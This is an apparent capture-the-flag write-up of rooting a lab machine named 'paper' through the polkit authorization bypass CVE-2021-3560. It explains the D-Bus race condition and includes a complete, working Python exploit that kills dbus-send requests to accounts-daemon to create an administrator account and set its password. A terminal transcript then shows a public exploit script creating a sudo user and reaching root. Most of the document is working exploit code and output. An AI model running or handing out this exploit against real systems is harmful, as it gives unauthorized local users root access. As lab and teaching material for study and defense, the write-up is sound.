CVE-2021-3560
PEAS initially flagged the target as vulnerable to CVE-2021-4034 (PwnKit), but the exploit failed with an error that the pkexec binary does not have the SUID bit set, which that exploit requires. This was notable because polkit itself was running on the target, so a different polkit bug was worth looking for.
Later, PEAS also reported that the target system is vulnerable to CVE-2021-3560.
CVE-2021-3560 is an authorization bypass in polkit's D-Bus request handling, classified as CWE-863 (Incorrect Authorization) and rated critical. When a process sends a D-Bus request that polkit must authorize and then exits before polkit has finished looking up the requester's UID, the lookup fails, and vulnerable polkit versions treat the request as though it came from a privileged caller and authorize it instead of refusing it. An unprivileged local user can therefore perform actions reserved for root, such as creating accounts, simply by killing their own request at the right moment. Confidentiality, integrity and availability are all impacted. PEAS did not report the affected version; the bug is present in polkit 0.113 through 0.118 and was fixed in 0.119, but distributions backport fixes without bumping the version string, so the installed version and the distro changelog both need checking before trusting the finding.
Exploit
I found an exploit online
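The technique the public exploit automates, as an added example written for this page (it is neither the CVE-2021-3560.py script run below nor code from polkit or accounts-daemon): accounts-daemon exposes CreateUser and SetPassword on the system bus and asks polkit to authorize each call, so the script starts dbus-send, kills it a few milliseconds later, and repeats until the request slips through. The username, real name and password "unicord", the 3 to 10 ms kill window, and the use of `pkaction --version` and `openssl passwd -6` are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Added example of the CVE-2021-3560 technique (not the script run in the writeup).

accounts-daemon's CreateUser and SetPassword go through polkit. If the calling
process dies a few milliseconds after sending the request, polkit's lookup of
the caller's UID fails and vulnerable versions authorize the call anyway.
"""
import random
import re
import subprocess
import time

# polkit 0.113 through 0.118 contain the bug; 0.119 fixed it. Distributions
# backport fixes without changing the version, so this is a hint, not proof.
VULNERABLE_RANGE = ((0, 113), (0, 118))


def parse_polkit_version(text):
    """Pull (major, minor) out of `pkaction --version` output such as
    'pkaction version 0.115'. Returns None if no version is present."""
    m = re.search(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def version_in_vulnerable_range(version):
    lo, hi = VULNERABLE_RANGE
    return version is not None and lo <= version <= hi


def create_user_cmd(username, realname):
    """dbus-send call to org.freedesktop.Accounts.CreateUser.
    The final int32:1 asks for an administrator account (0 = standard),
    which is what later lets the new user run sudo."""
    return [
        "dbus-send", "--system", "--dest=org.freedesktop.Accounts",
        "--type=method_call", "--print-reply",
        "/org/freedesktop/Accounts",
        "org.freedesktop.Accounts.CreateUser",
        f"string:{username}", f"string:{realname}", "int32:1",
    ]


def set_password_cmd(uid, password_hash, hint=""):
    """dbus-send call to org.freedesktop.Accounts.User.SetPassword on the
    object /org/freedesktop/Accounts/User<uid>; the hash is crypt(3) format."""
    return [
        "dbus-send", "--system", "--dest=org.freedesktop.Accounts",
        "--type=method_call", "--print-reply",
        f"/org/freedesktop/Accounts/User{uid}",
        "org.freedesktop.Accounts.User.SetPassword",
        f"string:{password_hash}", f"string:{hint}",
    ]


def race(cmd, succeeded=None, attempts=200):
    """Start cmd, kill it after a random 3-10 ms (assumed window), repeat.

    The kill is the whole exploit: too early and the request never reaches
    polkit, too late and polkit has already resolved the caller's UID and
    denies it. With no success predicate every attempt is made, because an
    unprivileged user cannot read the shadow file to confirm a password change.
    """
    for _ in range(attempts):
        proc = subprocess.Popen(cmd, stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
        time.sleep(random.uniform(0.003, 0.010))
        proc.kill()
        proc.wait()
        if succeeded is not None and succeeded():
            return True
    return succeeded is None


def lookup_uid(username):
    """UID of username via `id -u`, or None if the account does not exist yet."""
    res = subprocess.run(["id", "-u", username], capture_output=True, text=True)
    return int(res.stdout) if res.returncode == 0 else None


if __name__ == "__main__":
    username, realname, password = "unicord", "unicord", "unicord"  # assumed
    ver_text = subprocess.run(["pkaction", "--version"],
                              capture_output=True, text=True).stdout
    ver = parse_polkit_version(ver_text)
    print("polkit", ver, "in" if version_in_vulnerable_range(ver) else "not in",
          "the vulnerable range")
    if not race(create_user_cmd(username, realname),
                succeeded=lambda: lookup_uid(username) is not None):
        raise SystemExit("CreateUser never slipped past polkit")
    uid = lookup_uid(username)
    # openssl builds the SHA-512 crypt hash that accounts-daemon stores.
    pw_hash = subprocess.run(["openssl", "passwd", "-6", password],
                             capture_output=True, text=True).stdout.strip()
    race(set_password_cmd(uid, pw_hash))
    print(f"created admin user {username}; verify with: su {username}")
```

Two details matter in practice: the account type argument (int32:1) is what puts the user in the admin group, without which the later `sudo su root` would fail; and SetPassword needs its own race, since it is a separate polkit-authorized call, so the only reliable success check from an unprivileged shell is trying to log in as the new user afterwards.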
Exploitation
[dwight@paper shm]$ python3 CVE-2021-3560.py
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. Y / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_______|__\____/_/|_/___/\___/\____/_/|_/____/....
unicord: Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation
username: unicord
password: unicord
depends: Dependencies for exploit are met!
exploit: New user created!
prepare: New password hash generated!
exploit: Password configured for new user!
success: Created Sudo user "unicord" with password "unicord"!
It appears that the exploit script successfully created a sudo user, unicord.
[dwight@paper shm]$ su unicord
password: unicord
[unicord@paper shm]$
[unicord@paper shm]$ whoami
unicord
Switching to the newly created sudo user, unicord.
[unicord@paper shm]$ sudo su root
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for unicord: unicord
[root@paper shm]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper shm]# whoami
root
[root@paper shm]# hostname
paper
[root@paper shm]# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.143 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:45da prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:45da prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:45:da txqueuelen 1000 (Ethernet)
RX packets 11435640 bytes 1046215475 (997.7 MiB)
RX errors 0 dropped 119 overruns 0 frame 0
TX packets 12514581 bytes 26963689605 (25.1 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 351169 bytes 92153808 (87.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 351169 bytes 92153808 (87.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
virbr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 192.168.122.1 netmask 255.255.255.0 broadcast 192.168.122.255
ether 52:54:00:9b:e7:f7 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise